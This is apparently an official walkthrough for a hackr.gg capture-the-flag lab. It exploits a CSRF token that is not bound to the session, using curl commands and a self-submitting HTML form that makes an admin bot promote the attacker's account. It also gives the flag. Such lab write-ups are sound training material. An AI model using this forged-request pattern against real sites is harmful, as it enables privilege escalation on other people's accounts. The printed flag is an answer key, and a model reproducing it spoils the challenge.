HACKR.GG
hackr.gg — DevHub Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

DevHub

CSRF · CSRF Token Not Session-Bound (Global Token Pool)
Difficulty
Medium
Vuln class
CSRF Token Not Session-Bound (Global Token Pool)
Steps
5
// Objective
Use your own valid CSRF token in a forged request that the admin bot submits — promoting your account to admin and revealing the flag.
// Tools required
curlpython3
// Step-by-step walkthrough
1
Get your CSRF token
You are auto-logged in as "hacker". Fetch your CSRF token from the API.
Command / Input
curl -s -b 'session=hackersesstoken77' http://localhost:$PORT/api/csrf-token
Output
{"csrf_token":"<YOUR_TOKEN>"}
Copy this token — you will embed it in the attack page.
2
Create the exploit page
Write a static HTML file containing a form that submits to /api/promote with your CSRF token and your username.
Command / Input
cat > /tmp/exploit.html << 'EOF' <form id="f" action="http://localhost:$PORT/api/promote" method="POST"> <input name="username" value="hacker"> <input name="csrf_token" value="YOUR_TOKEN_HERE"> </form> <script>document.getElementById("f").submit()</script> EOF
3
Serve the exploit page
Start a simple HTTP server to host exploit.html so the admin bot can fetch it.
Command / Input
python3 -m http.server 8888 --directory /tmp
Leave this running.
4
Queue the admin bot
Tell the admin bot to visit your exploit page. The bot will fetch it, parse the form, and submit it using the admin session cookie — but with YOUR CSRF token.
Command / Input
curl -s -X POST http://localhost:$PORT/api/queue-visit -d 'url=http://localhost:8888/exploit.html'
Output
{"ok":true,"message":"Admin bot will visit shortly (every 5 s)"}
The server accepts the request because it only checks that the token exists in the global pool — it never verifies the token belongs to the admin session.
5
Confirm promotion and get the flag
After the bot visits, check your role. You should now be admin and the flag is returned.
Command / Input
curl -s -b 'session=hackersesstoken77' http://localhost:$PORT/api/me
Output
{"username":"hacker","role":"admin","flag":"HackrGG{csrf_t0k3n_n0t_b0und_s3ss10n_bypas5}"}
// Flag
Flag value
HackrGG{csrf_t0k3n_n0t_b0und_s3ss10n_bypas5}
Returned in the /api/me response once your account is promoted to admin.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute